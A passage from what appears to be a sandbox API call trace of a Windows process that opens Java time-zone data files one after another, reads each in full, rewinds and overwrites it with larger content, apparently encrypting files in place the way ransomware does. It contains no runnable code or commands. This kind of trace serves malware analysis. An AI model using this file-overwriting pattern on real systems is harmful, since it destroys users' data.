dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0139.393] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0139.393] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1b [0139.393] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0139.394] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.394] ReleaseMutex (hMutex=0x168) returned 1 [0139.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT+2", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT+2", cchWideChar=5, lpMultiByteStr=0x1f7ad2c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT+2", lpUsedDefaultChar=0x0) returned 5 [0139.394] ReadFile (in: hFile=0x208, lpBuffer=0x1f88bc8, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88bc8*, lpNumberOfBytesRead=0x331f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0139.395] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0139.395] WriteFile (in: hFile=0x208, lpBuffer=0x1effa98*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1effa98*, lpNumberOfBytesWritten=0x331f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0139.395] CloseHandle (hObject=0x208) returned 1 [0139.395] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-1" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0139.397] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0139.397] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1b [0139.397] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0139.397] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.397] ReleaseMutex (hMutex=0x168) returned 1 [0139.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-1", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-1", cchWideChar=5, lpMultiByteStr=0x1f7ad2c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT-1", lpUsedDefaultChar=0x0) returned 5 [0139.397] ReadFile (in: hFile=0x208, lpBuffer=0x1f88bc8, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88bc8*, lpNumberOfBytesRead=0x331f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0139.398] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0139.398] WriteFile (in: hFile=0x208, lpBuffer=0x1effa98*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1effa98*, lpNumberOfBytesWritten=0x331f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0139.399] CloseHandle (hObject=0x208) returned 1 [0139.399] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-4" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0139.400] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0139.400] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1b [0139.400] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0139.400] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.400] ReleaseMutex (hMutex=0x168) returned 1 [0139.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-4", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-4", cchWideChar=5, lpMultiByteStr=0x1f7ad2c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT-4", lpUsedDefaultChar=0x0) returned 5 [0139.401] ReadFile (in: hFile=0x208, lpBuffer=0x1f88bc8, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88bc8*, lpNumberOfBytesRead=0x331f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0139.402] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0139.402] WriteFile (in: hFile=0x208, lpBuffer=0x1effa98*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1effa98*, lpNumberOfBytesWritten=0x331f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0139.402] CloseHandle (hObject=0x208) returned 1 [0139.402] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Amsterdam" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\amsterdam"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0139.403] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0139.403] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x608 [0139.403] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0139.403] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.403] ReleaseMutex (hMutex=0x168) returned 1 [0139.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Amsterdam", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0139.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Amsterdam", cchWideChar=9, lpMultiByteStr=0x1f7340c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Amsterdam", lpUsedDefaultChar=0x0) returned 9 [0139.404] ReadFile (in: hFile=0x208, lpBuffer=0x26cf048, nNumberOfBytesToRead=0x608, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesRead=0x331f2bc*=0x608, lpOverlapped=0x0) returned 1 [0139.407] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0139.407] WriteFile (in: hFile=0x208, lpBuffer=0x2870cb8*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870cb8*, lpNumberOfBytesWritten=0x331f2d0*=0xb90, lpOverlapped=0x0) returned 1 [0139.407] CloseHandle (hObject=0x208) returned 1 [0139.407] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Chisinau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\chisinau"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0139.408] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0139.408] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4bc [0139.408] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0139.408] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.408] ReleaseMutex (hMutex=0x168) returned 1 [0139.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Chisinau", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0139.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Chisinau", cchWideChar=8, lpMultiByteStr=0x1f7320c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Chisinau", lpUsedDefaultChar=0x0) returned 8 [0139.408] ReadFile (in: hFile=0x208, lpBuffer=0x288fe58, nNumberOfBytesToRead=0x4bc, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288fe58*, lpNumberOfBytesRead=0x331f2bc*=0x4bc, lpOverlapped=0x0) returned 1 [0139.423] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0139.423] WriteFile (in: hFile=0x208, lpBuffer=0x2870cb8*, nNumberOfBytesToWrite=0xa44, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870cb8*, lpNumberOfBytesWritten=0x331f2d0*=0xa44, lpOverlapped=0x0) returned 1 [0139.423] CloseHandle (hObject=0x208) returned 1 [0139.423] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Lisbon" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\lisbon"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0139.425] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0139.425] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x74c [0139.425] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0139.425] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.425] ReleaseMutex (hMutex=0x168) returned 1 [0139.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lisbon", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0139.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lisbon", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lisbon", lpUsedDefaultChar=0x0) returned 6 [0139.425] ReadFile (in: hFile=0x208, lpBuffer=0x288f968, nNumberOfBytesToRead=0x74c, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesRead=0x331f2bc*=0x74c, lpOverlapped=0x0) returned 1 [0139.432] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0139.432] WriteFile (in: hFile=0x208, lpBuffer=0x2870cb8*, nNumberOfBytesToWrite=0xcd4, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870cb8*, lpNumberOfBytesWritten=0x331f2d0*=0xcd4, lpOverlapped=0x0) returned 1 [0139.433] CloseHandle (hObject=0x208) returned 1 [0139.433] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Oslo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\oslo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0139.434] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0139.434] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4c0 [0139.435] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0139.435] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.435] ReleaseMutex (hMutex=0x168) returned 1 [0139.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Oslo", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0139.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Oslo", cchWideChar=4, lpMultiByteStr=0x1f7ad2c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Oslo", lpUsedDefaultChar=0x0) returned 4 [0139.435] ReadFile (in: hFile=0x208, lpBuffer=0x288f968, nNumberOfBytesToRead=0x4c0, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesRead=0x331f2bc*=0x4c0, lpOverlapped=0x0) returned 1 [0139.952] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0139.952] WriteFile (in: hFile=0x208, lpBuffer=0x2870fb8*, nNumberOfBytesToWrite=0xa48, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870fb8*, lpNumberOfBytesWritten=0x331f2d0*=0xa48, lpOverlapped=0x0) returned 1 [0139.953] CloseHandle (hObject=0x208) returned 1 [0139.953] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Stockholm" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\stockholm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0139.953] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0139.953] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x410 [0139.953] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0139.954] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.954] ReleaseMutex (hMutex=0x168) returned 1 [0139.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Stockholm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0139.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Stockholm", cchWideChar=9, lpMultiByteStr=0x1f7346c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Stockholm", lpUsedDefaultChar=0x0) returned 9 [0139.954] ReadFile (in: hFile=0x208, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x410, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x331f2bc*=0x410, lpOverlapped=0x0) returned 1 [0140.724] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0140.724] WriteFile (in: hFile=0x208, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x998, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x331f2d0*=0x998, lpOverlapped=0x0) returned 1 [0140.725] CloseHandle (hObject=0x208) returned 1 [0140.726] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Warsaw" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\warsaw"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0140.727] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0140.727] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x588 [0140.728] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0140.728] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.017] ReleaseMutex (hMutex=0x168) returned 1 [0141.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Warsaw", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0141.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Warsaw", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Warsaw", lpUsedDefaultChar=0x0) returned 6 [0141.017] ReadFile (in: hFile=0x208, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x588, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x331f2bc*=0x588, lpOverlapped=0x0) returned 1 [0141.042] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0141.042] WriteFile (in: hFile=0x208, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0xb10, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x331f2d0*=0xb10, lpOverlapped=0x0) returned 1 [0141.042] CloseHandle (hObject=0x208) returned 1 [0141.043] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Cocos" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\cocos"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0141.043] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0141.043] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1b [0141.043] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0141.044] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.056] ReleaseMutex (hMutex=0x168) returned 1 [0141.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cocos", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cocos", cchWideChar=5, lpMultiByteStr=0x1f7ad2c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Cocos", lpUsedDefaultChar=0x0) returned 5 [0141.056] ReadFile (in: hFile=0x208, lpBuffer=0x1f88d30, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88d30*, lpNumberOfBytesRead=0x331f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0141.057] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0141.057] WriteFile (in: hFile=0x208, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x331f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0141.057] CloseHandle (hObject=0x208) returned 1 [0141.058] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MET" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\met"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0141.058] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0141.058] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4a0 [0141.059] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0141.059] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.070] ReleaseMutex (hMutex=0x168) returned 1 [0141.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MET", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0141.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MET", cchWideChar=3, lpMultiByteStr=0x1f7ad44, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MET", lpUsedDefaultChar=0x0) returned 3 [0141.071] ReadFile (in: hFile=0x208, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x4a0, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x331f2bc*=0x4a0, lpOverlapped=0x0) returned 1 [0141.089] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0141.089] WriteFile (in: hFile=0x208, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0xa28, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x331f2d0*=0xa28, lpOverlapped=0x0) returned 1 [0141.089] CloseHandle (hObject=0x208) returned 1 [0141.090] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Efate" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\efate"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0141.090] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 